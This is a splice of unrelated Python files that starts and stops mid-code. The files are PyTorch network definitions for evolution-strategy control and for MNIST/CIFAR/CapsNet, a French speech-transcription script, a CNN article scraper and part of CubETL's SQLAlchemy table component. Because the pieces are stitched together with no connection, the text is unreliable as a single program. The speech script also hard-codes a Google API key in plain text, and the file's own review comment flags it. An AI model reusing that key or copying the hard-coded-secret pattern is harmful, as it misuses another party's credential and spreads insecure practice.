                    m.bias.data.zero_()
            elif isinstance(m, nn.Linear):
                assert gain == calculate_xavier_gain(nn.Linear)
                nn.init.xavier_normal(m.weight.data, gain=gain)
            elif isinstance(m, nn.BatchNorm1d) or isinstance(m, nn.BatchNorm2d) or isinstance(m, nn.BatchNorm3d):
                if m.affine:
                    # Affine transform does nothing at first.
                    m.weight.data.fill_(1)
                    m.bias.data.zero_()
                # Running stats are initialized to have no history.
                m.running_mean.zero_()
                m.running_var.fill_(1)
def transform_range(in_value, in_maxs, in_mins, out_maxs, out_mins):
    """Map *in_value* from the range [in_mins, in_maxs] onto
    [out_mins, out_maxs], preserving the relative position within the range.

    All arguments are array-like; *in_value* must lie inside its range.
    """
    assert (in_value <= in_maxs).all() and (in_value >= in_mins).all()
    span_in = in_maxs - in_mins
    span_out = out_maxs - out_mins
    return ((in_value - in_mins) * span_out) / span_in + out_mins
def apply_sigmoid_and_transform(x, **kwargs):
    """Element-wise sigmoid followed by a reshape to ``kwargs['view_dim']``.

    Any other keyword arguments (range bounds for a transform step that is
    currently disabled) are accepted and ignored.
    """
    target_shape = kwargs.pop('view_dim')
    activated = nn.Sigmoid()(x)
    return activated.view(target_shape)
class ClassicalControlFNN(AbstractESModel):
    """
    FNN for classical control problems.

    Maps a flat observation through seven fully connected layers to either a
    physical action (Box spaces) or log-probabilities over discrete actions.
    """
    def __init__(self, observation_space, action_space):
        super(ClassicalControlFNN, self).__init__()
        if type(action_space) is gym.spaces.Box:
            # Continuous action space: physical output to be used directly.
            self.out_dim = action_space.shape
            self.n_out = int(np.prod(action_space.shape))
            # Unbounded Box dimensions fall back to the [-1, 1] range.
            out_mins = action_space.low if not np.isinf(action_space.low).any() else - np.ones(action_space.shape)
            out_maxs = action_space.high if not np.isinf(action_space.high).any() else np.ones(action_space.shape)
            sigmoid_mins = - np.ones(out_mins.shape)
            sigmoid_maxs = np.ones(out_maxs.shape)
            trsf_in = {'view_dim': (-1, *self.out_dim), 'in_maxs': sigmoid_maxs, 'in_mins': sigmoid_mins, 'out_maxs': out_maxs, 'out_mins': out_mins}
            self.out_activation = partial(apply_sigmoid_and_transform, **trsf_in)
        elif type(action_space) is gym.spaces.Discrete:
            # Discrete action space: log-probabilities; caller takes the argmax.
            self.n_out = action_space.n
            self.out_activation = nn.LogSoftmax(dim=1)
        elif type(action_space) is gym.spaces.MultiDiscrete:
            # Bug fix: was an IPython.embed() debug breakpoint; fail loudly instead.
            raise NotImplementedError('MultiDiscrete action spaces are not supported')
        elif type(action_space) is gym.spaces.MultiBinary:
            raise NotImplementedError('MultiBinary action spaces are not supported')
        elif type(action_space) is gym.spaces.Tuple:
            # Bug fix: comparison used `gym.spaces.tuple` (the module), which
            # could never match the Tuple space class.
            # https://github.com/openai/gym/blob/master/gym/envs/algorithmic/algorithmic_env.py
            raise NotImplementedError('Tuple action spaces are not supported')
        assert hasattr(observation_space, 'shape') and len(observation_space.shape) == 1
        assert hasattr(action_space, 'shape')
        self.in_dim = observation_space.shape
        self.n_in = int(np.prod(observation_space.shape))
        self.lin1 = nn.Linear(self.n_in, 32)
        self.relu1 = nn.ReLU()
        self.lin2 = nn.Linear(32, 64)
        self.relu2 = nn.ReLU()
        self.lin3 = nn.Linear(64, 128)
        self.relu3 = nn.ReLU()
        self.lin4 = nn.Linear(128, 128)
        self.relu4 = nn.ReLU()
        self.lin5 = nn.Linear(128, 64)
        self.relu5 = nn.ReLU()
        self.lin6 = nn.Linear(64, 32)
        self.relu6 = nn.ReLU()
        self.lin7 = nn.Linear(32, self.n_out)
        self._initialize_weights()

    def forward(self, x):
        """Forward pass: observation -> action (or log-probabilities)."""
        x = self.relu1(self.lin1(x))
        x = self.relu2(self.lin2(x))
        x = self.relu3(self.lin3(x))
        x = self.relu4(self.lin4(x))
        x = self.relu5(self.lin5(x))
        x = self.relu6(self.lin6(x))
        x = self.out_activation(self.lin7(x))
        return x
class ClassicalControlRNN(AbstractESModel):
    """
    RNN for classical control problems.

    NOTE(review): despite the name, the current architecture is purely
    feed-forward (no recurrent layers) — confirm intent.
    """
    def __init__(self, observation_space, action_space):
        super(ClassicalControlRNN, self).__init__()
        if type(action_space) is gym.spaces.Box:
            # Continuous action space: physical output to be used directly.
            self.out_dim = action_space.shape
            self.n_out = int(np.prod(action_space.shape))
            # Unbounded Box dimensions fall back to the [-1, 1] range.
            out_mins = action_space.low if not np.isinf(action_space.low).any() else - np.ones(action_space.shape)
            out_maxs = action_space.high if not np.isinf(action_space.high).any() else np.ones(action_space.shape)
            sigmoid_mins = - np.ones(out_mins.shape)
            sigmoid_maxs = np.ones(out_maxs.shape)
            trsf_in = {'view_dim': (-1, *self.out_dim), 'in_maxs': sigmoid_maxs, 'in_mins': sigmoid_mins, 'out_maxs': out_maxs, 'out_mins': out_mins}
            self.out_activation = partial(apply_sigmoid_and_transform, **trsf_in)
        elif type(action_space) is gym.spaces.Discrete:
            # Discrete action space: log-probabilities; caller takes the argmax.
            self.n_out = action_space.n
            self.out_activation = nn.LogSoftmax(dim=1)
        assert hasattr(observation_space, 'shape') and len(observation_space.shape) == 1
        assert hasattr(action_space, 'shape')
        # Bug fix: `in_dim` was never set here (unlike the sibling models),
        # which broke the inherited `summary` property for this class.
        self.in_dim = observation_space.shape
        self.n_in = int(np.prod(observation_space.shape))
        self.lin1 = nn.Linear(self.n_in, 32)
        self.relu1 = nn.ReLU()
        self.lin2 = nn.Linear(32, 64)
        self.relu2 = nn.ReLU()
        self.lin3 = nn.Linear(64, 64)
        self.relu3 = nn.ReLU()
        self.lin4 = nn.Linear(64, 32)
        self.relu4 = nn.ReLU()
        self.lin5 = nn.Linear(32, self.n_out)
        self._initialize_weights()

    def forward(self, x):
        """Forward pass: observation -> action (or log-probabilities)."""
        x = self.relu1(self.lin1(x))
        x = self.relu2(self.lin2(x))
        x = self.relu3(self.lin3(x))
        x = self.relu4(self.lin4(x))
        x = self.out_activation(self.lin5(x))
        return x
class MujocoFNN(AbstractESModel):
    """
    FNN for Mujoco control problems.

    Wider version of ClassicalControlFNN (512-1024-1024-512-256-128 hidden units).
    """
    def __init__(self, observation_space, action_space):
        super(MujocoFNN, self).__init__()
        if type(action_space) is gym.spaces.Box:
            # Continuous action space: physical output to be used directly.
            self.out_dim = action_space.shape
            self.n_out = int(np.prod(action_space.shape))
            # Unbounded Box dimensions fall back to the [-1, 1] range.
            out_mins = action_space.low if not np.isinf(action_space.low).any() else - np.ones(action_space.shape)
            out_maxs = action_space.high if not np.isinf(action_space.high).any() else np.ones(action_space.shape)
            sigmoid_mins = - np.ones(out_mins.shape)
            sigmoid_maxs = np.ones(out_maxs.shape)
            trsf_in = {'view_dim': (-1, *self.out_dim), 'in_maxs': sigmoid_maxs, 'in_mins': sigmoid_mins, 'out_maxs': out_maxs, 'out_mins': out_mins}
            self.out_activation = partial(apply_sigmoid_and_transform, **trsf_in)
        elif type(action_space) is gym.spaces.Discrete:
            # Discrete action space: log-probabilities; caller takes the argmax.
            self.n_out = action_space.n
            self.out_activation = nn.LogSoftmax(dim=1)
        elif type(action_space) is gym.spaces.MultiDiscrete:
            # Bug fix: was an IPython.embed() debug breakpoint; fail loudly instead.
            raise NotImplementedError('MultiDiscrete action spaces are not supported')
        elif type(action_space) is gym.spaces.MultiBinary:
            raise NotImplementedError('MultiBinary action spaces are not supported')
        elif type(action_space) is gym.spaces.Tuple:
            # Bug fix: comparison used `gym.spaces.tuple` (the module), which
            # could never match the Tuple space class.
            # https://github.com/openai/gym/blob/master/gym/envs/algorithmic/algorithmic_env.py
            raise NotImplementedError('Tuple action spaces are not supported')
        assert hasattr(observation_space, 'shape') and len(observation_space.shape) == 1
        assert hasattr(action_space, 'shape')
        self.in_dim = observation_space.shape
        self.n_in = int(np.prod(observation_space.shape))
        self.lin1 = nn.Linear(self.n_in, 512)
        self.relu1 = nn.ReLU()
        self.lin2 = nn.Linear(512, 1024)
        self.relu2 = nn.ReLU()
        self.lin3 = nn.Linear(1024, 1024)
        self.relu3 = nn.ReLU()
        self.lin4 = nn.Linear(1024, 512)
        self.relu4 = nn.ReLU()
        self.lin5 = nn.Linear(512, 256)
        self.relu5 = nn.ReLU()
        self.lin6 = nn.Linear(256, 128)
        self.relu6 = nn.ReLU()
        self.lin7 = nn.Linear(128, self.n_out)
        self._initialize_weights()

    def forward(self, x):
        """Forward pass: observation -> action (or log-probabilities)."""
        x = self.relu1(self.lin1(x))
        x = self.relu2(self.lin2(x))
        x = self.relu3(self.lin3(x))
        x = self.relu4(self.lin4(x))
        x = self.relu5(self.lin5(x))
        x = self.relu6(self.lin6(x))
        x = self.out_activation(self.lin7(x))
        return x
class DQN(AbstractESModel):
    """The CNN used by Mnih et al (2015) in "Human-level control through deep
    reinforcement learning" for Atari environments.
    """

    def __init__(self, observation_space, action_space):
        super(DQN, self).__init__()
        assert hasattr(observation_space, 'shape') and len(observation_space.shape) == 3
        assert hasattr(action_space, 'n')
        self.in_dim = observation_space.shape
        in_channels = observation_space.shape[0]
        out_dim = action_space.n
        # Convolutional feature extractor (three conv+ReLU stages).
        self.conv1 = nn.Conv2d(in_channels, out_channels=32, kernel_size=(8, 8), stride=(4, 4))
        self.conv1_relu = nn.ReLU()
        self.conv2 = nn.Conv2d(32, out_channels=64, kernel_size=(4, 4), stride=(2, 2))
        self.conv2_relu = nn.ReLU()
        self.conv3 = nn.Conv2d(64, out_channels=64, kernel_size=(3, 3), stride=(1, 1))
        self.conv3_relu = nn.ReLU()
        # Classifier head; its input width is derived by a dry-run forward pass.
        flat_features = self._get_conv_output(observation_space.shape)
        self.lin1 = nn.Linear(flat_features, 512)
        self.lin1_relu = nn.ReLU()
        self.lin2 = nn.Linear(512, out_dim)
        self.lin2_logsoftmax = nn.LogSoftmax(dim=1)
        self._initialize_weights()

    def forward(self, x):
        """Return per-action log-probabilities for a batch of observations."""
        features = self._forward_features(x)
        flat = features.view(features.size(0), -1)
        hidden = self.lin1_relu(self.lin1(flat))
        return self.lin2_logsoftmax(self.lin2(hidden))

    def _get_conv_output(self, shape):
        """Compute the flattened size of the conv output via a dummy forward pass."""
        dummy = Variable(torch.rand(1, *shape))
        features = self._forward_features(dummy)
        return features.data.view(1, -1).size(1)

    def _forward_features(self, x):
        """Run only the convolutional part of the network."""
        x = self.conv1_relu(self.conv1(x))
        x = self.conv2_relu(self.conv2(x))
        x = self.conv3_relu(self.conv3(x))
        return x
class MNISTNet(AbstractESModel):
    """
    Convolutional network for the MNIST data set.

    Each conv stage is conv -> batch-norm -> 2x2 max-pool -> ReLU; batch
    normalisation normalises layer outputs before pooling and nonlinearity
    following Ioffe (2015) [https://arxiv.org/pdf/1502.03167.pdf].
    """

    def __init__(self):
        super(MNISTNet, self).__init__()
        self.in_dim = torch.Size((1, 28, 28))
        self.conv1 = nn.Conv2d(1, 10, kernel_size=(5, 5))
        self.conv1_bn = nn.BatchNorm2d(10)
        self.conv1_pool = nn.MaxPool2d(kernel_size=(2, 2))
        self.conv1_relu = nn.ReLU()
        self.conv2 = nn.Conv2d(10, 20, kernel_size=(5, 5))
        self.conv2_bn = nn.BatchNorm2d(20)
        self.conv2_pool = nn.MaxPool2d(kernel_size=(2, 2))
        self.conv2_relu = nn.ReLU()
        self.fc1 = nn.Linear(320, 50)
        self.fc1_bn = nn.BatchNorm1d(50)
        self.fc1_relu = nn.ReLU()
        self.fc2 = nn.Linear(50, 10)
        self.fc2_logsoftmax = nn.LogSoftmax(dim=1)
        self._initialize_weights()

    def forward(self, x):
        """Return class log-probabilities for a batch of 1x28x28 images."""
        out = self.conv1_relu(self.conv1_pool(self.conv1_bn(self.conv1(x))))
        out = self.conv2_relu(self.conv2_pool(self.conv2_bn(self.conv2(out))))
        out = out.view(-1, 320)
        out = self.fc1_relu(self.fc1_bn(self.fc1(out)))
        return self.fc2_logsoftmax(self.fc2(out))
class MNISTNetDropout(AbstractESModel):
    """
    Convolutional network for the MNIST data set using dropout for
    regularisation (2-D dropout after conv2, standard dropout after fc1)
    instead of batch normalisation.
    """

    def __init__(self):
        super(MNISTNetDropout, self).__init__()
        self.in_dim = torch.Size((1, 28, 28))
        self.conv1 = nn.Conv2d(1, 10, kernel_size=(5, 5))
        self.conv1_pool = nn.MaxPool2d(kernel_size=(2, 2))
        self.conv1_relu = nn.ReLU()
        self.conv2 = nn.Conv2d(10, 20, kernel_size=(5, 5))
        self.conv2_pool = nn.MaxPool2d(kernel_size=(2, 2))
        self.conv2_relu = nn.ReLU()
        self.conv2_dropout = nn.Dropout2d(p=0.2)
        self.fc1 = nn.Linear(320, 50)
        self.fc1_relu = nn.ReLU()
        self.fc1_dropout = nn.Dropout(p=0.5)
        self.fc2 = nn.Linear(50, 10)
        self.fc2_logsoftmax = nn.LogSoftmax(dim=1)
        self._initialize_weights()

    def forward(self, x):
        """Return class log-probabilities for a batch of 1x28x28 images."""
        out = self.conv1_relu(self.conv1_pool(self.conv1(x)))
        out = self.conv2_dropout(self.conv2_relu(self.conv2_pool(self.conv2(out))))
        out = out.view(-1, 320)
        out = self.fc1_dropout(self.fc1_relu(self.fc1(out)))
        return self.fc2_logsoftmax(self.fc2(out))
class MNISTNetNoBN(AbstractESModel):
    """MNIST network variant without batch normalisation (and no dropout)."""

    def __init__(self):
        super(MNISTNetNoBN, self).__init__()
        self.in_dim = torch.Size((1, 28, 28))
        self.conv1 = nn.Conv2d(1, 10, kernel_size=(5, 5))
        self.conv1_pool = nn.MaxPool2d(kernel_size=(2, 2))
        self.conv1_relu = nn.ReLU()
        self.conv2 = nn.Conv2d(10, 20, kernel_size=(5, 5))
        self.conv2_pool = nn.MaxPool2d(kernel_size=(2, 2))
        self.conv2_relu = nn.ReLU()
        self.fc1 = nn.Linear(320, 50)
        self.fc1_relu = nn.ReLU()
        self.fc2 = nn.Linear(50, 10)
        self.fc2_logsoftmax = nn.LogSoftmax(dim=1)
        self._initialize_weights()

    def forward(self, x):
        """Return class log-probabilities for a batch of 1x28x28 images."""
        out = self.conv1_relu(self.conv1_pool(self.conv1(x)))
        out = self.conv2_relu(self.conv2_pool(self.conv2(out)))
        out = out.view(-1, 320)
        out = self.fc1_relu(self.fc1(out))
        return self.fc2_logsoftmax(self.fc2(out))
class MNISTNetNoInit(MNISTNet):
    """MNISTNet variant that keeps PyTorch's default weight initialisation.

    The parent constructor builds the layers and Xavier-initialises them;
    re-creating every module afterwards discards that custom initialisation
    in favour of each layer's default one.
    """

    def __init__(self):
        super(MNISTNetNoInit, self).__init__()
        self.in_dim = torch.Size((1, 28, 28))
        self.conv1 = nn.Conv2d(1, 10, kernel_size=(5, 5))
        self.conv1_pool = nn.MaxPool2d(kernel_size=(2, 2))
        self.conv1_relu = nn.ReLU()
        self.conv2 = nn.Conv2d(10, 20, kernel_size=(5, 5))
        self.conv2_pool = nn.MaxPool2d(kernel_size=(2, 2))
        self.conv2_relu = nn.ReLU()
        self.fc1 = nn.Linear(320, 50)
        self.fc1_relu = nn.ReLU()
        self.fc2 = nn.Linear(50, 10)
        self.fc2_logsoftmax = nn.LogSoftmax(dim=1)
class CIFARNet(nn.Module):
    """LeNet-style CNN for 32x32 RGB CIFAR images with *n* output classes.

    Architecture: conv(3->6,5x5) -> pool -> conv(6->16,5x5) -> pool ->
    fc(400->120) -> fc(120->84) -> fc(84->n), matching the forward pass
    this class has always used.

    Bug fixes vs. the previous revision: removed an IPython.embed() debug
    breakpoint left in __init__; removed duplicate, mutually contradictory
    layer definitions (conv1/conv2/conv1_bn were each assigned twice with
    incompatible shapes, and the survivors did not match forward()); defined
    the `self.pool` module that forward() actually uses; corrected `in_dim`
    to the CIFAR input size; dropped the call to the nonexistent
    self._initialize_weights() (this class derives from nn.Module, not
    AbstractESModel); and wired the final layer to `n` instead of a
    hard-coded 10 so the class parameter is honoured.
    """

    def __init__(self, n=10):
        super(CIFARNet, self).__init__()
        self.in_dim = torch.Size((3, 32, 32))
        self.conv1 = nn.Conv2d(3, 6, (5, 5))
        # Shared 2x2 pooling used after both conv stages.
        self.pool = nn.MaxPool2d((2, 2), stride=2)
        self.conv2 = nn.Conv2d(6, 16, (5, 5))
        # 32 -> 28 -> 14 -> 10 -> 5, so the flattened size is 16 * 5 * 5.
        self.fc1 = nn.Linear(16 * 5 * 5, 120)
        self.fc2 = nn.Linear(120, 84)
        self.fc3 = nn.Linear(84, n)

    def forward(self, x):
        """Return raw class scores (logits) for a batch of 3x32x32 images."""
        x = self.pool(F.relu(self.conv1(x)))
        x = self.pool(F.relu(self.conv2(x)))
        x = x.view(-1, 16 * 5 * 5)
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        x = self.fc3(x)
        return x
class CapsuleLayer(nn.Module):
    """Capsule layer (Sabour et al., 2017): either a bank of parallel conv
    'primary' capsules (num_route_nodes == -1) or a fully connected capsule
    layer using dynamic routing-by-agreement over `num_iterations` rounds.
    """

    def __init__(self, num_capsules, num_route_nodes, in_channels, out_channels, kernel_size=None, stride=None,
                 num_iterations=3):
        super(CapsuleLayer, self).__init__()
        self.num_route_nodes = num_route_nodes
        self.num_iterations = num_iterations
        self.num_capsules = num_capsules
        if num_route_nodes != -1:
            # One (in_channels -> out_channels) linear map per (capsule, route node).
            self.route_weights = nn.Parameter(torch.randn(num_capsules, num_route_nodes, in_channels, out_channels))
        else:
            self.capsules = nn.ModuleList(
                [nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=0) for _ in
                 range(num_capsules)])

    def squash(self, tensor, dim=-1):
        """Shrink vector norms into [0, 1) while preserving direction."""
        squared_norm = (tensor ** 2).sum(dim=dim, keepdim=True)
        scale = squared_norm / (1 + squared_norm)
        return scale * tensor / torch.sqrt(squared_norm)

    def forward(self, x):
        if self.num_route_nodes != -1:
            # Prediction vectors ("priors") for every (capsule, route node) pair.
            priors = x[None, :, :, None, :] @ self.route_weights[:, None, :, :, :]
            # Bug fix: logits were created with an unconditional .cuda(), which
            # crashed on CPU-only machines and mismatched non-default devices.
            # zeros_like inherits both device and dtype from `priors`.
            logits = torch.zeros_like(priors)
            for i in range(self.num_iterations):
                probs = capsule_softmax(logits, dim=2)
                outputs = self.squash((probs * priors).sum(dim=2, keepdim=True))
                if i != self.num_iterations - 1:
                    # Agreement between priors and outputs sharpens the routing.
                    delta_logits = (priors * outputs).sum(dim=-1, keepdim=True)
                    logits = logits + delta_logits
        else:
            outputs = [capsule(x).view(x.size(0), -1, 1) for capsule in self.capsules]
            outputs = torch.cat(outputs, dim=-1)
            outputs = self.squash(outputs)
        return outputs
class CapsuleNet(nn.Module):
    """CapsNet for 28x28 single-channel images: conv stem, primary capsules,
    digit capsules with routing, plus a fully connected reconstruction decoder.
    """

    def __init__(self, n_classes):
        super(CapsuleNet, self).__init__()
        # Bug fix: n_classes must be stored — forward() referenced it as a
        # free (undefined) name and raised NameError on the y=None path.
        self.n_classes = n_classes
        self.conv1 = nn.Conv2d(in_channels=1, out_channels=256, kernel_size=9, stride=1)
        self.primary_capsules = CapsuleLayer(num_capsules=8, num_route_nodes=-1, in_channels=256, out_channels=32,
                                             kernel_size=9, stride=2)
        self.digit_capsules = CapsuleLayer(num_capsules=n_classes, num_route_nodes=32 * 6 * 6, in_channels=8,
                                           out_channels=16)
        self.decoder = nn.Sequential(
            nn.Linear(16 * n_classes, 512),
            nn.ReLU(inplace=True),
            nn.Linear(512, 1024),
            nn.ReLU(inplace=True),
            nn.Linear(1024, 784),
            nn.Sigmoid()
        )

    def forward(self, x, y=None):
        """Return (class probabilities, reconstructions).

        When *y* (one-hot labels) is omitted, the most active capsule is used
        to select which capsule feeds the decoder.
        """
        x = F.relu(self.conv1(x), inplace=True)
        x = self.primary_capsules(x)
        x = self.digit_capsules(x).squeeze().transpose(0, 1)
        classes = (x ** 2).sum(dim=-1) ** 0.5
        # Explicit dim: `classes` is (batch, n_classes); softmax over classes.
        classes = F.softmax(classes, dim=-1)
        if y is None:
            # In all batches, get the most active capsule.
            _, max_length_indices = classes.max(dim=1)
            # Bug fixes: use self.n_classes, and build the one-hot on the
            # input's device instead of an unconditional .cuda().
            y = torch.eye(self.n_classes, device=x.device).index_select(dim=0, index=max_length_indices)
        reconstructions = self.decoder((x * y[:, :, None]).view(x.size(0), -1))
        return classes, reconstructions
class CapsuleLoss(nn.Module):
    """CapsNet loss: margin loss plus 0.0005 x summed MSE reconstruction loss,
    averaged over the batch (Sabour et al., 2017).
    """

    def __init__(self):
        super(CapsuleLoss, self).__init__()
        # Fix: `size_average=False` is deprecated; reduction='sum' is the
        # exact equivalent.
        self.reconstruction_loss = nn.MSELoss(reduction='sum')

    def forward(self, images, labels, classes, reconstructions):
        # Margin loss with m+ = 0.9, m- = 0.1; absent classes down-weighted by 0.5.
        left = F.relu(0.9 - classes, inplace=True) ** 2
        right = F.relu(classes - 0.1, inplace=True) ** 2
        margin_loss = labels * left + 0.5 * (1. - labels) * right
        margin_loss = margin_loss.sum()
        reconstruction_loss = self.reconstruction_loss(reconstructions, images)
        return (margin_loss + 0.0005 * reconstruction_loss) / images.size(0)
|
# Ad-hoc script: transcribe a local WAV file with Google Speech Recognition.
import speech_recognition as sr
# obtain path to "english.wav" in the same folder as this script
from os import path
AUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), "testAudio/test.wav")
# use the audio file as the audio source
r = sr.Recognizer()
with sr.AudioFile(AUDIO_FILE) as source:
    # Read the entire file into an AudioData object.
    audio = r.record(source)
# NOTE(review): a Google API key is committed here in plain text — it should
# be rotated and loaded from an environment variable / secrets store instead.
try:
    print(r.recognize_google(audio, language="fr-fr", key="31a5e855f751a62fd6b36ab22ff8df379f867379"))
except sr.UnknownValueError:
    print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
    print("Could not request results from Google Speech Recognition service; {0}".format(e))
import requests
from bs4 import BeautifulSoup
def getText(url):
    """
    Fetch *url* and return the text of its main CNN article body,
    or None when the expected markup is not present.
    """
    response = requests.get(url)
    soup = BeautifulSoup(response.content, "html.parser")
    # CNN's "rail" article layout; other layouts are not supported.
    article = soup.find('article', class_="pg-rail-tall pg-rail--align-right")
    if article is None:
        # Robustness fix: previously raised AttributeError on non-matching pages;
        # the caller already handles a None return.
        return None
    body = article.div.div.div
    # Bug fix (the old FIXME): get_text() was called but its result discarded,
    # so the function returned a bs4 Tag instead of the promised text.
    return body.get_text()
def study_to_string(study):
    """
    Format a study record (title, summary, journal, url) as a multi-line string.

    The title is always included; the other fields appear only when they are
    neither None nor empty.
    """
    parts = ["Title: " + study[0]]
    optional = (("Summary: ", study[1]), ("Journal: ", study[2]), ("URL: ", study[3]))
    for prefix, value in optional:
        if value is not None and value != "":
            parts.append(prefix + value)
    return "\n".join(parts)
def main(url, nresults=3):
    """
    Given *url* pointing at an article, return a list of up to *nresults*
    formatted study strings (a list of empty strings when the article body
    could not be extracted).
    """
    article = getText(url)
    if article is None:
        return [""] * nresults
    # Imported lazily, mirroring the original placement (avoids paying the
    # import unless an article was actually extracted).
    from main import best_studies
    formatted = []
    for study in best_studies(str(article), nresults):
        if study is None:
            break
        formatted.append(study_to_string(study))
    return formatted
# Ad-hoc manual check: run this module directly against a sample CNN article.
if __name__ == '__main__':
    result = main("https://www.cnn.com/2020/05/02/us/isabella-geriatric-center-coronavirus-nyc/index.html")
    """
    For future readers: main is documented
    """
# CubETL
# Copyright (c) 2013-2019 Jose Juan Montes
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import sys
from cubetl.core import Node, Component
from cubetl.core.exceptions import ETLConfigurationException
from cubetl.text.functions import parsebool
from sqlalchemy.engine import create_engine
from sqlalchemy.exc import ResourceClosedError
from sqlalchemy.schema import Table, MetaData, Column, ForeignKey
from sqlalchemy.sql.expression import and_
from sqlalchemy.types import Integer, String, Float, Boolean, Unicode, Date, Time, DateTime, Binary
# Get an instance of a logger
logger = logging.getLogger(__name__)
class Connection(Component):
    """Database connection component backed by a lazily created SQLAlchemy engine."""

    def __init__(self, url, connect_args=None):
        super().__init__()
        self.url = url
        # Extra driver arguments, e.g. {'sslmode': 'require'}
        self.connect_args = connect_args or {}
        self._engine = None

    def lazy_init(self):
        """Create the engine and open the connection on first use."""
        if self._engine is not None:
            return
        logger.info("Connecting to database: %s (%s)", self.url, self.connect_args)
        self._engine = create_engine(self.url, connect_args=self.connect_args)
        self._connection = self._engine.connect()

    def connection(self):
        """Return the (lazily opened) SQLAlchemy connection."""
        self.lazy_init()
        return self._connection

    def engine(self):
        """Return the (lazily created) SQLAlchemy engine."""
        self.lazy_init()
        return self._engine
class SQLColumn(Component):
    """Declarative description of one column of a SQLTable."""

    TYPE_INTEGER = "INTEGER"
    TYPE_STRING = "TEXT"

    def __init__(self, name, type, pk=False, nullable=True, label=None):
        super().__init__()
        # Back-reference to the owning SQLTable; assigned by the table itself.
        self.sqltable = None
        self.name = name
        self.type = type
        self.pk = pk
        # Fall back to the column name when no (truthy) label is given.
        self.label = name if not label else label
        self.nullable = nullable

    def __str__(self):
        return "%s(name=%s)" % (self.__class__.__name__, self.name)
class SQLColumnFK(SQLColumn):
    """SQL column that holds a foreign key pointing at another SQLColumn."""

    def __init__(self, name, type, pk, fk_sqlcolumn, null=True, label=None):
        super().__init__(name, type, pk, null, label=label)
        # The SQLColumn (on another SQLTable) this column references.
        self.fk_sqlcolumn = fk_sqlcolumn
class SQLTable(Component):
    """Describes a SQL table (name, connection, columns) and provides
    row-level select / insert / update / upsert operations on it.

    The class-level counters aggregate statistics across ALL SQLTable
    instances; initialize() shadows them with per-instance counters so
    finalize() can report both totals and per-table figures.
    """

    # Class-wide operation counters (reported once, on first finalize).
    _selects = 0
    _inserts = 0
    _updates = 0
    _finalized = False

    # Store modes understood by StoreRow.
    STORE_MODE_LOOKUP = "lookup"
    STORE_MODE_INSERT = "insert"
    STORE_MODE_UPSERT = "upsert"

    _pk = False            # cached primary-key column (False = not yet resolved)
    columns = []
    create = True
    _unicode_errors = 0
    _lookup_changed_fields = None

    def __init__(self, name, connection, columns, label=None):
        super(SQLTable, self).__init__()
        self.sa_table = None       # SQLAlchemy Table, built in initialize()
        self.sa_metadata = None    # SQLAlchemy MetaData, built in initialize()
        self.name = name
        self.connection = connection
        self.label = label if label else name
        self.columns = columns or []
        # Give each column a back-reference to this table.
        # NOTE(review): iterates `columns` (not self.columns), so a None
        # argument raises despite the `or []` fallback above — TODO confirm.
        for col in columns:
            col.sqltable = self

    def _get_sa_type(self, column):
        """Map a column's declarative type name to a SQLAlchemy type object.

        Raises an Exception for unknown type names.
        """
        if (column.type == "Integer"):
            return Integer
        elif (column.type == "String"):
            #if (column.length is None): column.length = 128
            return Unicode(length = 128)
        elif (column.type == "Float"):
            return Float
        elif (column.type == "Boolean"):
            return Boolean
        elif (column.type == "AutoIncrement"):
            # AutoIncrement is represented as an Integer column.
            return Integer
        elif (column.type == "Date"):
            return Date
        elif (column.type == "Time"):
            return Time
        elif (column.type == "DateTime"):
            return DateTime
        elif (column.type == "Binary"):
            return Binary
        else:
            raise Exception("Invalid data type (%s): %s" % (column, column.type))

    def finalize(self, ctx):
        """Log aggregate and per-table operation statistics, then finalize
        the connection component."""
        # Report the class-wide totals only once, from the first table finalized.
        if (not SQLTable._finalized):
            SQLTable._finalized = True
            if (SQLTable._inserts + SQLTable._selects > 0):
                logger.info("SQLTable Totals  ins/upd/sel: %d/%d/%d " %
                            (SQLTable._inserts, SQLTable._updates, SQLTable._selects))
        if (self._inserts + self._selects > 0):
            logger.info("SQLTable %-18s ins/upd/sel: %6d/%6d/%-6d " %
                        (self.name, self._inserts, self._updates, self._selects))
        if (self._unicode_errors > 0):
            logger.warning("SQLTable %s found %d warnings assigning non-unicode fields to unicode columns" %
                           (self.name, self._unicode_errors))
        ctx.comp.finalize(self.connection)
        super(SQLTable, self).finalize(ctx)

    def initialize(self, ctx):
        """Build the SQLAlchemy table from the declared columns and create it
        in the database if it does not exist yet."""
        super(SQLTable, self).initialize(ctx)
        if self._lookup_changed_fields == None:
            self._lookup_changed_fields = []
        ctx.comp.initialize(self.connection)
        logger.debug("Loading table %s on %s" % (self.name, self))
        self.sa_metadata = MetaData()
        self.sa_table = Table(self.name, self.sa_metadata)
        # Shadow the class-level counters with per-instance ones.
        self._selects = 0
        self._inserts = 0
        self._updates = 0
        self._unicode_errors = 0
        # Drop?
        columns_ex = []
        for column in self.columns:
            logger.debug("Adding column to %s: %s" % (self, column))
            column.sqltable = self
            # Check for duplicate names
            if (column.name in columns_ex):
                raise ETLConfigurationException("Duplicate column name '%s' in %s" % (column.name, self))
            columns_ex.append(column.name)
            # Configure column
            if isinstance(column, SQLColumnFK):
                # A FK column can only be added once its target table exists.
                if column.fk_sqlcolumn.sqltable.sa_table is None:
